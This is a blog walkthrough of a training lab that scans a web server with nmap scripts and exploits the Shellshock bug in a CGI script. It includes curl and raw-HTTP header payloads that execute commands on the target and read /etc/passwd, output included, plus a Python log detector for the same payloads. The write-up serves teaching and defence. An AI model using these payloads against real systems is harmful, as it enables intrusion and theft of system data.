Vulnerability Scanning With Nmap Scripts

Posted by r3kind1e on March 30, 2023

Chapter 9. Nmap Scripting Engine

ifconfig
eth1: 192.152.25.2

Target IP Address: 192.152.25.3

nmap -sV -O 192.152.25.3
http://192.152.25.3
ls -al /usr/share/nmap/scripts/
ls -al /usr/share/nmap/scripts/ | grep http
nmap -sV -p 80 --script=http-enum 192.152.25.3
searchsploit apache 2.4.6
nano /usr/share/nmap/scripts/http-enum.nse
ls -al /usr/share/nmap/scripts/ | grep vuln
ls -al /usr/share/nmap/scripts/ | grep shellshock
nmap -sV -p 80 --script=http-shellshock 192.152.25.3
http://192.152.25.3/gettime.cgi
nmap -sV -p 80 --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 192.152.25.3
ls -al /usr/share/nmap/scripts/ | grep ftp

Demo: Vulnerability Scanning With Nmap Scripts

Shellshock

Overview

OWASP Top 10 is an awareness document that outlines the most critical security risks to web applications. Pentesting is performed according to the OWASP Top 10 standard to reduce or mitigate those security risks.

In this exercise, we will focus on OWASP A9, Using Components with Known Vulnerabilities, and perform an attack against a web server that is vulnerable to CVE-2014-6071.

Objective: Exploit the vulnerability and execute arbitrary commands on the target machine.

Instructions:

  • This lab is dedicated to you! No other users are on this network.
  • Once you start the lab, you will have access to a Kali GUI instance.
  • Your Kali instance has an interface with IP address 192.X.Y.2. Run “ip addr” to find the values of X and Y.
  • Do not attack the gateway located at IP address 192.X.Y.1.

Tasks

Pre-requisites

  1. Basic familiarity with TCP & UDP.

Requirements

This task does not have any requirements.

Solutions

The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-1911.pdf


My own approach

root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.126.145.2  netmask 255.255.255.0  broadcast 192.126.145.255
        ether 02:42:c0:7e:91:02  txqueuelen 0  (Ethernet)

Target IP Address: 192.126.145.3

root@attackdefense:~# nmap -sV -O 192.126.145.3
Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-30 20:49 IST
Nmap scan report for target-1 (192.126.145.3)
Host is up (0.000028s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.6 ((Unix))
MAC Address: 02:42:C0:7E:91:03 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=3/30%OT=80%CT=1%CU=30230%PV=N%DS=1%DC=D%G=Y%M=0242C0%T
OS:M=6425A8A5%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.14 seconds
http://192.126.145.3/
root@attackdefense:~# ls -al /usr/share/nmap/scripts
root@attackdefense:~# ls -al /usr/share/nmap/scripts/ | grep http

http-enum

root@attackdefense:~# nmap -sV -p 80 --script=http-enum 192.126.145.3
Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-30 21:03 IST
Nmap scan report for target-1 (192.126.145.3)
Host is up (0.000076s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.6 ((Unix))
|_http-server-header: Apache/2.4.6 (Unix)
MAC Address: 02:42:C0:7E:91:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.91 seconds
root@attackdefense:~# searchsploit apache 2.4.6
Exploits: No Result
Shellcodes: No Result
Papers: No Result
root@attackdefense:~# nano /usr/share/nmap/scripts/http-enum.nse
root@attackdefense:~# ls -al /usr/share/nmap/scripts/ | grep vuln

View page source.

<!DOCTYPE html>
<html>
<head>
<style>
body { 
    background-image: url('static/images/background.jpg');
    background-repeat: no-repeat;
    background-attachment: fixed;
    background-position: center; 
}
</style>
	<script>
	   setInterval(function() { 
		var xhttp = new XMLHttpRequest();
		xhttp.onreadystatechange = function() {
			if (this.readyState == 4 && this.status == 200) {
				document.getElementById("output").innerHTML = this.responseText;
			}
		};
		xhttp.open("GET", "/gettime.cgi", true);
		xhttp.send();
	    }, 1000);
	</script>

</head>
<body>
	<div style="position:fixed;top:67%;left:40%" id="output" ></div>
</body>
</html>

http://192.126.145.3/gettime.cgi

CVE-2014-6271

root@attackdefense:~# ls -al /usr/share/nmap/scripts/ | grep shellshock
-rw-r--r-- 1 root root  5551 Jan  9  2019 http-shellshock.nse

Script http-shellshock

Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications.

To detect this vulnerability, the script executes a command that prints a random string and then attempts to find that string in the response body. Web applications that do not print anything back will not be detected with this method.

By default, the script injects the payload into the HTTP headers User-Agent, Cookie and Referer.
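To see what this probe looks like from the server side, here is an added example (not part of the original post, the lab, or the nmap script) that scans constructed Apache combined-format access log lines for the `() {` function-definition prefix that the script places in the headers listed above. The log lines are made up for the example; the regex is the same signature pattern used by common IDS/WAF rules for Shellshock.

```python
import re
from typing import Dict, List, Optional

# Shellshock payloads start with an exported-function definition "() {" that an
# unpatched bash (the lab target runs bash 4.3.0) evaluated from any environment
# variable. A CGI server copies request headers into the environment
# (HTTP_USER_AGENT, HTTP_COOKIE, HTTP_REFERER ...), so matching "() {" in those
# headers catches both the http-shellshock probe and hand-crafted requests.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache combined log format; Referer and User-Agent are the attacker-controlled
# fields that end up as environment variables of the CGI process.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into fields; None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_attempts(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per line whose User-Agent or Referer carries a
    Shellshock-style function definition, noting which header matched."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({"ip": rec["ip"], "req": rec["req"], "header": field})
                break
    return hits


# Constructed sample log lines (not captured from the lab): the first two mimic
# a manual probe and the nmap script against /gettime.cgi, the third is benign.
SAMPLE_LOG = [
    '192.126.145.2 - - [30/Mar/2023:21:21:03 +0530] "GET /gettime.cgi HTTP/1.1" 200 30 "-" "() { :; }; echo; echo; /bin/bash -c \'id\'"',
    '192.126.145.2 - - [30/Mar/2023:21:21:04 +0530] "GET /gettime.cgi HTTP/1.1" 200 30 "() { :;}; echo deadbeef" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"',
    '10.0.0.7 - - [30/Mar/2023:21:22:10 +0530] "GET /gettime.cgi HTTP/1.1" 200 30 "http://192.126.145.3/" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f"shellshock attempt from {hit['ip']} via {hit['header']}: {hit['req']}")
```

Because the script also injects into Cookie, a production detector should inspect that header too, which the default combined format does not log.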

root@attackdefense:~# nmap -sV -p 80 --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 192.126.145.3
Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-30 21:21 IST
Nmap scan report for target-1 (192.126.145.3)
Host is up (0.000045s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.6 ((Unix))
|_http-server-header: Apache/2.4.6 (Unix)
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known as Shellshock. It seems the server
|       is executing commands injected via malicious HTTP headers.
|             
|     Disclosure date: 2014-09-24
|     References:
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|       http://seclists.org/oss-sec/2014/q3/685
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
MAC Address: 02:42:C0:7E:91:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.50 seconds
root@attackdefense:~# nmap -sV -p 80 --script http-shellshock --script-args uri=/gettime.cgi 192.126.145.3
root@attackdefense:~# ls -al /usr/share/nmap/scripts/ | grep ftp
-rw-r--r-- 1 root root  4530 Jan  9  2019 ftp-anon.nse
-rw-r--r-- 1 root root  3253 Jan  9  2019 ftp-bounce.nse
-rw-r--r-- 1 root root  3108 Jan  9  2019 ftp-brute.nse
-rw-r--r-- 1 root root  3258 Jan  9  2019 ftp-libopie.nse
-rw-r--r-- 1 root root  3295 Jan  9  2019 ftp-proftpd-backdoor.nse
-rw-r--r-- 1 root root  3748 Jan  9  2019 ftp-syst.nse
-rw-r--r-- 1 root root  6007 Jan  9  2019 ftp-vsftpd-backdoor.nse
-rw-r--r-- 1 root root  5943 Jan  9  2019 ftp-vuln-cve2010-4221.nse
-rw-r--r-- 1 root root  5678 Jan  9  2019 tftp-enum.nse

Shellshock exploit + vulnerable environment

GET /gettime.cgi HTTP/1.1
Host: 192.126.145.3
User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.126.145.3/
Connection: close
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
root@attackdefense:~# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'id'" http://192.126.145.3/gettime.cgi

uid=1(daemon) gid=1(daemon) groups=1(daemon)
root@attackdefense:~# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'ps -ef'" http://192.126.145.3/gettime.cgi

UID          PID    PPID  C STIME TTY          TIME CMD
root           1       0  0 15:17 ?        00:00:00 /usr/bin/python /usr/bin/supervisord -n
root          10       1  0 15:17 ?        00:00:00 /bin/bash /root/startup.sh
daemon        11      10  0 15:17 ?        00:00:04 /opt/apache/bin/httpd -X
daemon        12      11  0 15:17 ?        00:00:02 /opt/apache/bin/httpd -X
daemon     12062      12  0 16:25 ?        00:00:00 /usr/local/bash-4.3.0/bin/bash /opt/apache/htdocs/gettime.cgi
daemon     12063   12062  0 16:25 ?        00:00:00 ps -ef